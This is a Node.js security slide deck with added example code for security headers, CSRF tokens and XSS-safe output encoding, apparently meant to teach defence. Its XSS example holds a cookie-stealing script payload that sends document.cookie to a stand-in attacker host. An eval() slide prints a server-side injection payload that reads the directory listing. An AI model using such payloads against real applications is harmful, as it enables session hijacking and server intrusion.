Hacking NodeJS applications for fun and profit: Testing NodeJS Security (slide deck) by @jmortegac
Agenda ▪ Introduction to Node.js security ▪ npm security packages ▪ Node Goat project ▪ Tools
Node JS ▪ JavaScript in the backend ▪ Built on Chrome's JavaScript runtime (V8) ▪ Node.js is based on an event loop ▪ Designed to be asynchronous ▪ Single thread ▪ There is no built-in limit on the number of concurrent requests, so Node.js keeps accepting connections under a flood, but the single event loop is the bottleneck: one CPU-bound handler or blocking call stalls every in-flight request. Flood protection (rate limiting, request timeouts, a reverse proxy in front) has to be added explicitly; it does not come with the runtime.
Security updates ▪ https://expressjs.com/en/advanced/security-updates.html
Package vulnerabilities ▪ https://www.npmjs.com/advisories
Npm security packages ▪ Helmet ▪ express-session ▪ cookie-session ▪ csurf ▪ express-validator ▪ bcrypt-node ▪ express-enforces-ssl
Security HTTP Headers ▪ Strict-Transport-Security ▪ X-Frame-Options ▪ X-XSS-Protection ▪ X-Content-Type-Options ▪ Content-Security-Policy
Helmet module ▪ https://www.npmjs.com/package/helmet ▪ https://github.com/helmetjs/helmet
Helmet module ▪ hidePoweredBy → removes the X-Powered-By header ▪ hpkp → HTTP Public Key Pinning, meant to protect against MITM with a mis-issued certificate; browsers have since dropped HPKP support and Helmet removed the middleware in v4, so do not rely on it ▪ hsts → forces HTTPS connections (Strict-Transport-Security) ▪ noCache → disables client-side caching ▪ frameguard → clickjacking protection (X-Frame-Options) ▪ xssFilter → sets X-XSS-Protection; the browser filter it controls is deprecated and current Helmet sets the header to 0, so Content-Security-Policy and output encoding are the real XSS defences
Helmet CSP
Check security headers ▪ http://cyh.herokuapp.com/cyh ▪ https://securityheaders.io/
Express versions ▪ https://www.shodan.io/search?query=express
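The following is an added example, not code from the deck or from Helmet itself: a dependency-free Express-style middleware that sets the headers the Helmet middlewares above produce, together with the "which header is missing" check that the header-scanning sites above run. The header values are assumptions chosen here (Helmet's own defaults differ in places, its default CSP in particular is longer), and the fake response object is constructed so the block runs offline.

```javascript
// Added example: headers equivalent to Helmet's hsts / frameguard / noSniff /
// xssFilter / CSP / noCache / hidePoweredBy, without the Helmet dependency.
// Values are assumptions for this demo, not Helmet's exact defaults.
const SECURITY_HEADERS = {
  'Strict-Transport-Security': 'max-age=15552000; includeSubDomains',      // hsts (180 days)
  'X-Frame-Options': 'SAMEORIGIN',                                          // frameguard
  'X-Content-Type-Options': 'nosniff',                                      // noSniff
  'X-XSS-Protection': '0',                                                  // legacy filter off
  'Content-Security-Policy': "default-src 'self'; object-src 'none'; frame-ancestors 'self'",
  'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate', // noCache
};

// Express-style middleware (req, res, next); also works with the plain http module.
function securityHeaders(req, res, next) {
  res.removeHeader('X-Powered-By'); // what hidePoweredBy / app.disable('x-powered-by') does
  for (const [name, value] of Object.entries(SECURITY_HEADERS)) res.setHeader(name, value);
  if (typeof next === 'function') next();
}

// Headers a tester expects on every response; anything absent is a finding.
const EXPECTED = ['strict-transport-security', 'x-frame-options',
                  'x-content-type-options', 'content-security-policy'];

function auditHeaders(headers) {
  const present = {};
  for (const [k, v] of Object.entries(headers)) present[k.toLowerCase()] = v;
  const findings = EXPECTED.filter(h => !(h in present)).map(h => `missing ${h}`);
  if ('x-powered-by' in present) findings.push(`fingerprintable: x-powered-by=${present['x-powered-by']}`);
  if (present['strict-transport-security'] && !/max-age=\d+/.test(present['strict-transport-security']))
    findings.push('hsts without max-age');
  return findings;
}

// Constructed stand-in for http.ServerResponse (stores names lower-cased, like Node does).
function fakeResponse(initial = {}) {
  const headers = {};
  for (const [k, v] of Object.entries(initial)) headers[k.toLowerCase()] = v;
  return {
    setHeader(k, v) { headers[k.toLowerCase()] = v; },
    removeHeader(k) { delete headers[k.toLowerCase()]; },
    getHeaders() { return { ...headers }; },
  };
}

// Audit a default Express-like response, then the same response after the middleware.
function demo() {
  const before = fakeResponse({ 'X-Powered-By': 'Express' });
  const after = fakeResponse({ 'X-Powered-By': 'Express' });
  securityHeaders({}, after, () => {});
  return { before: auditHeaders(before.getHeaders()), after: auditHeaders(after.getHeaders()) };
}
```

In an Express app this is registered before any route with app.use(securityHeaders); Helmet does the same job with per-header configuration, which is why it is the package to use in practice rather than this hand-rolled version.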
Disable x-powered-by ▪ Avoid framework fingerprinting (the X-Powered-By: Express header is what the Shodan query above matches on) ▪ Use Helmet's hidePoweredBy middleware, or app.disable('x-powered-by') in Express
Sessions management ▪ https://www.npmjs.com/package/cookie-session ▪ secure ▪ httpOnly ▪ domain ▪ path ▪ expires
httpOnly & secure:true
XSS attacks ▪ An attacker can exploit an XSS vulnerability to: ▪ Steal session cookies / session hijacking ▪ Redirect the user to malicious sites ▪ Defacing and content manipulation ▪ Cross-Site Request Forgery
CSRF attacks
https://www.npmjs.com/package/csurf (csurf was deprecated by the Express team in 2022; the synchronizer-token pattern it implements is still the right defence, so use a maintained module or a session-bound token of your own)
CSRF
  const csrf = require('csurf');
  app.use(csrf({ cookie: true })); // cookie-parser must be mounted first; or omit { cookie: true } to store the secret in the session
  app.use(function (request, response, next) {
    response.locals.csrfToken = request.csrfToken(); // same name the template reads below (the original set csrftoken, which the template never found)
    next();
  });

  <form action="/process" method="POST">
    <input type="hidden" name="_csrf" value="{{csrfToken}}">
    <button type="submit">Submit</button>
  </form>
CSRF
Filter/sanitize user input ▪ Fixing XSS attacks ▪ https://www.npmjs.com/package/sanitizer ▪ Module express-validator ▪ https://www.npmjs.com/package/express-validator
Express Validator
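Added example, not from the deck, the sanitizer package or express-validator: the two halves of "filter/sanitize user input" as a reviewer wants to see them, allow-list validation on the way in and HTML encoding on the way out, shown against a constructed cookie-stealing payload next to the vulnerable reflection. The display-name rule and the page template are assumptions for this demo.

```javascript
// Added example: validate input (allow-list), encode output (HTML escaping).
// PAYLOAD, the name rule and the templates are constructed for the demo.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };

// Encode for the HTML text/attribute-value context. This is the same idea as
// express-validator's escape(); it is not the same character table.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, ch => ESCAPES[ch]);
}

// Allow-list validation of a display name: letters, digits, space, dot, hyphen, 1..40 chars.
// Rejecting early keeps junk out of the database; it does not replace output encoding.
function validateDisplayName(input) {
  if (typeof input !== 'string') return { ok: false, error: 'must be a string' };
  const value = input.trim();
  if (!/^[\p{L}\p{N} .-]{1,40}$/u.test(value)) return { ok: false, error: 'invalid characters or length' };
  return { ok: true, value };
}

// Vulnerable: the stored/reflected value lands in the page verbatim.
function renderProfileVulnerable(name) {
  return `<h1>Welcome ${name}</h1>`;
}

// Hardened: encoded for the context it is inserted into.
function renderProfileSafe(name) {
  return `<h1>Welcome ${escapeHtml(name)}</h1>`;
}

// Constructed payload of the "steal session cookies" kind from the XSS slide.
const PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";

function demo() {
  return {
    vulnerable: renderProfileVulnerable(PAYLOAD),
    safe: renderProfileSafe(PAYLOAD),
    payloadValidation: validateDisplayName(PAYLOAD),
    normalValidation: validateDisplayName('  Ada Lovelace '),
  };
}
```

Encoding is context-specific: this table is right for element text and quoted attribute values, not for a value placed inside a script block, a URL, or an unquoted attribute, which is where a template engine's auto-escaping or a CSP earns its keep.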
Bcrypt-node ▪ https://github.com/kelektiv/node.bcrypt.js
Node Goat ▪ http://nodegoat.herokuapp.com/tutorial ▪ https://github.com/OWASP/NodeGoat
EVAL() ATTACKS ▪ payload submitted where the application calls eval() on user input: res.end(require('fs').readdirSync('.').toString()) ▪ runs inside the server process with its privileges, here dumping the working directory listing into the response
Insecure Direct Object References ▪ Use the session instead of the request param ▪ var userId = req.session.userId;
Tools ▪ KrakenJS ▪ Lusca middleware ▪ NodeJsScan
http://krakenjs.com/
https://github.com/krakenjs/lusca
NodeJsScan ▪ https://github.com/ajinabraham/NodeJsScan ▪ https://github.com/jmortega/NodeJsScan/blob/master/rules.xml
GitHub repositories ▪ https://github.com/jmortega/testing_nodejs_security ▪ https://github.com/cr0hn/vulnerable-node ▪ https://github.com/rdegges/svcc-auth ▪ https://github.com/strongloop/loopback-getting-started-intermediate ▪ https://github.com/Feeld/strong-node
Node security learning ▪ https://www.udemy.com/nodejs-security-pentesting-and-exploitation/
Books
References ▪ https://blog.risingstack.com/node-js-security-checklist/ ▪ https://blog.risingstack.com/node-js-security-tips/ ▪ https://www.npmjs.com/package/helmet ▪ https://expressjs.com/en/advanced/best-practice-security.html ▪ https://expressjs.com/en/advanced/security-updates.html ▪ http://nodegoat.herokuapp.com/tutorial ▪ https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project